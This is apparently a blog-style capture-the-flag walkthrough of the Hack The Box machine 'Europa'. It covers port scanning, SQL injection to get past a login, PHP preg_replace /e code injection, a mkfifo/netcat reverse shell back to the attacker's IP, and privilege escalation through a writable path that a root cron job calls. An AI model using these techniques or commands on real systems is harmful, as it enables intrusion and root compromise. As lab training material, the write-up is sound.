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As always I start with a simple UP/Down scan on all TCP ports.
$ nmap -T4 -p- -oX ./nmapb.xml europa.htb

Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o ./nmapb.html

Ports 22, 80 and 443 open..

Looks like this box is going to be mostly web based

Let's run nmap again with the -A switch to run all scripts against these three ports

$ nmap -T4 -A -p22,80,443 -oX ./nmapf.xtml europa.htb

Then we will convert that output to HTML also
xsltproc ./nmapf.xml -o ./nmapf.html

Looks like we have an Ubuntu box running a fairly new version of OpenSSH on port 22 and Apache 2.4.18 on 80 and 443

Let's check out those Apache sites

Both are just the default Apache install page

Got a little bit more info from the certificate on 443

Europacorp.htb should be the box

I ran a bunch of scans at these two domains

Tried Dirb and Dirbuster and didn't find anything…

Looking back at the nmap results I see this


Also in the cert we found this email address



Woot we got a login page

Tried some generic SQLI here but didn't get anywhere in the browser. It wouldn't let me do anything with the email address

What about if we try it with burp to get around that silly data validation.

We got a redirection

We are in.

None of the links on the dashboard are real, they just link back to the dashboard.php.

However there is this tools section.

Which would let a user input an IP address,presumably the IP address of the OPENVPN server and the tool would generate a OpenVPN config file to connect up to the company VPN…

But as an attacker what do we have here?. A way to input some data and the server interacting with that data hopefully we can use this to get our foothold.

This is what the request looks like in burp

If we look at the code used in the generate we can see this hidden input

There is a field named pattern with /ip_address/ as the value

Since that is surrounded by / / 's it make me think there might be some regex involved in the the code that is generating the config

There is a fairly well know depreciated modifier in php preg_replace

Here is a blog about why this is depreciated.

If we can insert /e in the pattern field then whatever comes after it will be will be evaluated as a PHP expression….

So we can use our input to insert PHP code in our request..

So let's try to ping our VPN IP

So in php that would look like this

system('ping -c')

For this to work we are going to need to encode those spaces in our command

We can just put in a + sign for the spaces

So it would then look like 

So first let's setup a listener on our 

sudo tcpdump -i tun0 -n icmp

So tcpdump on just interface tun0 and only showing ICMP

Here is what I ended up with for my request



Ok so Proof of concept work there..

Let's try to get a shell

I tired a couple but finally had luck with a mkfifo shell

So it would start by looking like this

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
Then of course we need to edit that for our VPN IP

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10 1234 >/tmp/f
Now we need ot  URL encode

I use this website to do it


Before we try to send this to the tools.php we need to setup our listener

$ nc -lnvp 5555

Here is my final request


Sent that to tools.php using burp annnnnnnnnddddddddd

We got a shell, we got a shell, we got a shell hey hey hey hey

1930S GIF

Poking around the system and we already can get the user flag

In the /home/john folder

I used wget to xfer to the europa box

I saw this in the output ( after I gave it execute rights)

Here is a job that runs every minute as root.. Coool

Lets see what it does

$ cat /var/www/cronjobs/clearlogs
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');

So it looks like it blanks out the access.log……

But then it calls a script in /var/www/cmd/

Lets see what is in that script

Nothing, it doesn't exist but it looks like we have right access to this folder so we can make one :)

So I made one with this line

cat /root/root.txt  >> /tmp/circusmonkey/root.txt

Copied it over using wget and my SimpleHTTPServer 

Waited a minute

The cat'd the file

Running Late Cut You Off GIF by Saturday Night Live


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